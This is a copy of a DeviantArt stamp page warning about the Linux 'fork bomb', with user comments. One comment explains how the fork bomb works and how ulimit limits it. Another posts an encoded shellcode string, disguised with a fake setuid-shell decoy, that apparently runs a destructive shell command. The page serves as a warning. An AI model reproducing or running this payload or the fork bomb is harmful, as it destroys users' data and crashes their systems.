HOME | DD

Published: 2010-02-08 15:36:35 +0000 UTC; Views: 4281; Favourites: 48; Downloads: 102
Redirect to original
Description
[ anonymouslink@deviantART.com ]
$ cat /etc/description
One of the "deadly Linux commands" that some people may try to get you to execute in a console/terminal. This particular one is known as the "forkbomb", and will tell your system to execute a huge number of processes until the system freezes, which can often lead to corruption of data. SO DON'T DO IT!
$ sh /usr/bin/disclaimer
Awesomeness Β© me ^^
Related content
Comments: 19
Meztli72 [2017-09-11 04:43:05 +0000 UTC]
Destroy she said!!!
www.youtube.com/watch?v=dMgkCjβ¦
Another version of deadly command:
char esp[] __attribute__ ((section(β.textβ))) /* e.s.p
release */
= β\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68β
β\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99β
β\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7β
β\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56β
β\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31β
β\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69β
β\x6e\x2f\x73\x68\x00\x2d\x63\x00β
βcp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;β;
π: 0 β©: 0
Steelsoldat [2013-06-26 01:06:56 +0000 UTC]
i think it's great (we need more linux people )
π: 0 β©: 0
The-Dork-King In reply to AnonymousLink [2014-08-26 02:59:01 +0000 UTC]
This explains the fork bomb, which the sites calls a denial of service attack Β www.shellhacks.com/en/HowTo-Crβ¦
π: 0 β©: 0
znxster [2010-02-11 23:47:10 +0000 UTC]
Whilst dangerous this command is normally mitigated by default setup on systems now. See this basically attempts to spawn hundreds of processes but if the user is restricted:
$ ulimit -u
1024
Then he can only create 1024 processes (which should not kill the system). Of course if it says this:
$ ulimit -u
unlimited
Then it is dangerous as it will just continue grow until all the resources are eaten up.
For those that want to understand commands like this here is it broken down.
# Define a function called ':'
: () {
# Call function and pipe output to function
# Placing in background
: | : &
# End Function
) ;
# Call the function to start the nasty
:
Always interesting discussing these things though !
π: 0 β©: 1
AnonymousLink In reply to znxster [2010-02-12 03:18:22 +0000 UTC]
I agree! Not many people would know what it ACTUALLY does.
π: 0 β©: 0
AnonymousLink In reply to Pixel-Sam [2010-02-10 02:08:55 +0000 UTC]
That's why it's dangerous. No one would think twice, right?
π: 0 β©: 1
AnonymousLink In reply to BlackSoliloquy [2010-02-08 23:45:00 +0000 UTC]
I, for one, like to see users come BACK to Linux. Not be scared away.
π: 0 β©: 1
BlackSoliloquy In reply to AnonymousLink [2010-02-09 13:03:34 +0000 UTC]
Relax, it was just a joke.
π: 0 β©: 0
AnonymousLink In reply to mchenry [2010-02-08 16:16:11 +0000 UTC]
Gonna be making a couple more "Deadly Linux Commands" stamps soon. xD
π: 0 β©: 0